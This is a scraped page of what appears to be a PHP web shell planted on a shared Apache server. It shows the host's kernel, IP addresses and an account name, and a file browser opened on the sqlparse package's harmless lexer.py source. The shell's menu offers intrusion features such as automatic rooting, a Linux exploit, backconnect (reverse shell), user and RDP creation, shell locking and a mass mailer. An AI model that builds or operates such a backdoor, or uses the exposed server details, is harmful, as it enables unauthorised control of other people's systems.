Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
sqlparse /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
engine
[ DIR ]
drwxr-xr-x
filters
[ DIR ]
drwxr-xr-x
__init__.py
2.13
KB
-rw-r--r--
__main__.py
610
B
-rw-r--r--
cli.py
5.58
KB
-rw-r--r--
exceptions.py
342
B
-rw-r--r--
formatter.py
7.39
KB
-rw-r--r--
keywords.py
28.86
KB
-rw-r--r--
lexer.py
2.4
KB
-rw-r--r--
sql.py
20.18
KB
-rw-r--r--
tokens.py
1.62
KB
-rw-r--r--
utils.py
3.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lexer.py
# # Copyright (C) 2009-2020 the sqlparse authors and contributors # <see AUTHORS file> # # This module is part of python-sqlparse and is released under # the BSD License: https://opensource.org/licenses/BSD-3-Clause """SQL Lexer""" # This code is based on the SqlLexer in pygments. # http://pygments.org/ # It's separated from the rest of pygments to increase performance # and to allow some customizations. from io import TextIOBase from sqlparse import tokens from sqlparse.keywords import SQL_REGEX from sqlparse.utils import consume class Lexer: """Lexer Empty class. Leaving for backwards-compatibility """ @staticmethod def get_tokens(text, encoding=None): """ Return an iterable of (tokentype, value) pairs generated from `text`. If `unfiltered` is set to `True`, the filtering mechanism is bypassed even if filters are defined. Also preprocess the text, i.e. expand tabs and strip it if wanted and applies registered filters. Split ``text`` into (tokentype, text) pairs. ``stack`` is the initial stack (default: ``['root']``) """ if isinstance(text, TextIOBase): text = text.read() if isinstance(text, str): pass elif isinstance(text, bytes): if encoding: text = text.decode(encoding) else: try: text = text.decode('utf-8') except UnicodeDecodeError: text = text.decode('unicode-escape') else: raise TypeError("Expected text or file-like object, got {!r}". format(type(text))) iterable = enumerate(text) for pos, char in iterable: for rexmatch, action in SQL_REGEX: m = rexmatch(text, pos) if not m: continue elif isinstance(action, tokens._TokenType): yield action, m.group() elif callable(action): yield action(m.group()) consume(iterable, m.end() - pos - 1) break else: yield tokens.Error, char def tokenize(sql, encoding=None): """Tokenize sql. Tokenize *sql* using the :class:`Lexer` and return a 2-tuple stream of ``(token type, value)`` items. """ return Lexer().get_tokens(sql, encoding)
Close